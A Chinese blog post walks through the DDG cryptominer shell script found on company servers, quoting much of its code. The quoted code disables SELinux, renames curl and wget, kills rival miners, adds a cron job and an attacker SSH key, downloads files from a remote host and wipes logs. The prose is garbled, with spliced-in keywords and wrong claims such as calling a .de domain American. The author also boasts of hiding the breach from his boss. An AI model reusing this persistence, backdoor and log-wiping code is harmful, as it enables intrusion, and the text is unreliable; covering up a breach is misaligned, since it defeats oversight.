公司有几台机器,近来CPU始终在疯转,如同是吃了药,仍然在发热。因为机器实在是太多,有那么几台安全性防护没有到位,就仍然躺在角落里疯狂运转。
图片来自Pexels
直至统一的监控脚本接管了这几台机器linux入门,异常情况才得以浮出水面。最后发觉了多个奇奇怪怪的进程,发觉是一个挖矿脚本。
下载出来学习了一下,发觉脚本的编撰者,有着较高的水平。似乎在他人机器进行挖矿行为是不道德的,但掩藏不了脚本编撰者的淫荡操作。
挖矿,是计算机技术界最让人蒙蔽的行为之一,但它挣钱。获悉,这段脚本名叫DDG,早已挖取了价值一千多万人民币的虚拟币货币。
本着学习的目的,我稍为剖析了一下这个神奇的脚本,也算是吸尽它的精华,为我所用。
这事我都没敢告诉老总,由于说了他也不懂,反生事端。不过和你们交流一下还是可以的,由于大家懂啊。
01.Code1
#!/bin/sh
脚本的第一行,看上去是一行注释,但似乎并不是。它规定了接出来的脚本,即将采用哪一个SHELL执行。
像我们平时用的bash、zsh等,属于sh的超集,这个脚本使用sh作为执行的shell,具有更好的可移植性。
02.Code2
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
setenforce是Linux的selinux防火墙配置命令,执行setenforce0表示关掉selinux防火墙。2代表的是标准错误(stderr)的意思。
所以前面,使用重定向符,将命令的错误输出定向到/dev/null设备中。这个设备是一个虚拟设备,意思是哪些都不干。特别适宜静悄悄的干坏事。
03.Code3
sync && echo 3 >/proc/sys/vm/drop_caches
脚本贴心的帮我们释放了一些显存资源,便于获取更多的资源进行挖矿。
众所周知,Linux系统会随着长时间的运行,会形成好多缓存,清除方法就是写一个数字到drop_caches文件里,这个数字一般为3。
sync命令将所有未写的系统缓冲区讲到c盘中,执行以后就可以放心的释放缓存了。
04.Code4
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
没错,里面那些句子就是完成了一些普通的操作。值得注意的是,它把我们的一些常用命令,使用mv命令给重名了。
这在执行命令的时侯,都会变得分成功能的操蛋。这脚本早已修改了计算机的一些文件,属于犯罪的范畴了。
脚本为了复用一些功能,具象出了好多的函数。我们直接跳到main函数的执行,之后看一下这个过程。
05.Code5
首先是kill_miner_proc函数。代码很长linux命令手册,就不全部贴下来了。
kill_miner_proc()
{
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
...
pkill -f biosetjenkins
pkill -f Loopback
...
crontab -r
rm -rf /var/spool/cron/*
挖矿领域是一个相爱相杀的领域。这个方式首先使用ps、grep、kill一套组合,杀死了同行的挖矿脚本,之后停掉了同行的cron脚本,黑吃黑的觉得。
在这段脚本里,使用了pkill命令。这个命令会中止进程,并按终端号踢出用户,比较暴力。
06.Code6
接出来执行的是kill_sus_proc函数。
ps axf -o "pid"|while read procid
do
...
done
ps加上o参数,可以指定要输出的列,在这儿只输出的进程的pid,之后使用read函数,对procid进行遍历操作。
07.Code7
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
...
fi
里面就是遍历操作过程了,我们可以看见if句子的句型。其中$?指的是上一个命令的退出状态。
0表示没有错误,其他任何值表明有错误。-ne是不等于的意思,意思就是才能匹配到tmp这个字符串。
08.Code8
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
...
done
呵呵,前面又来了一次循环遍历。不过此次针对的目标,是CPU使用超过40%的进程。这就有点狠了:影响我挖矿的进程,都得死!相煎何太紧。
09.Code9
再接出来,脚本针对不同的用户属性,进行了不同的操作。
首先是root用户。通过判定是否存在$rtdir文件,来确定是否是root权限。
chattr -i /etc/sysupdate*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/networkservice
使用chattr命令,把一些重要的文件,搞成不能任意改动的只读属性,也是够损的。之后,操作cron程序,把脚本的更新服务加入到定时中。
就是下边这段脚本。
10.Code10
if [ ! -f "/usr/bin/crontab" ]
then
echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
else
[[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
fi
注意[[$cont=~"update.sh"]]这以小段代码,奇特的很。[[]]是shell中外置的一个命令,支持字符串的模式匹配。
使用=~的时侯比特币挖矿程序 linux,甚至支持shell的正则表达式,强悍的令人发指。它的输出结果是一个bool类型,所以才能使用||进行拼接。
而前面的单小括弧(),是的是一个命令组,括弧中多个命令之间用分号隔开,最后一个命令可以没有分号;和`cmd`的疗效基本是一样的。
11.Code11
搞完了定时任务,就要配置ssh手动登入了,通过把私钥追加到信任列表中就可以。
chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/
12.Code12
说曹操曹操就到,下边的脚本就使用了``进行操作。
filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
if [ "$filesize_config" -ne "$config_size" ]
then
pkill -f sysupdate
rm /etc/config.json
downloads $config_url /etc/config.json $config_url_backup
else
echo "no need download"
fi
通过一系列骚操作,获取到配置文件的大小,假若判定文件大小不一致,这么就重新下载一个。这就用到了downloads函数。
shell中的函数,看上去比较奇特,前面的参数传递,如同是脚本传递一样,传送给函数。
13.Code13
downloads $config_url /etc/config.json $config_url_backup
这句话,就传递了三个参数。其实,文件要从遥远的服务器上下载。域名是.de结尾的,证明是个美国的域名,其他的我们一无所知。
downloads()
{
if [ -f "/usr/bin/curl" ]
then
echo $1,$2
http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
else
curl --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/cur" ]
then
http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
cur --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
cur --connect-timeout 10 --retry 100 $1 > $2
else
cur --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/wget" ]
then
wget --timeout=10 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=10 --tries=100 -O $2 $3
fi
elif [ -f "/usr/bin/wge" ]
then
wge --timeout=10 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wge --timeout=10 --tries=100 -O $2 $3
fi
fi
}
我觉得,这段代码作者写的又臭又长,完全没有彰显出自己应有的水平。应当是赶工期,没有想好代码的复用,就会写的那么有失水准。
我们前面说到,脚本改了几个命令的名子,其中就有curl。这个命令是这么的强悍,以至于脚本的作者都忍不住加了不少参数:
若果没有curl?那就使用替补的wget,套路都是一样的。
14.Code14
接出来是一系列相像的操作比特币挖矿程序 linux,最后,对iptables一批操作。
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
15.Code15
悉心的脚本编撰者,还使用命令清除了操作日志。
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
不露死角,洒脱走开。可以见到,且不说真正的挖矿程序,仅仅是这个小脚本,作者也下足了工夫。
脚本里命令繁杂,使用形式多样,紧缩格式端庄,不仅有一点啰嗦,没有加密之外,是一个十分好的用来学习的脚本。
瞧了瞧被控制的机器,我赶快偷偷的重装了机器。就当它是一个梦吧。老总问起的时侯,哪些都没有发生过。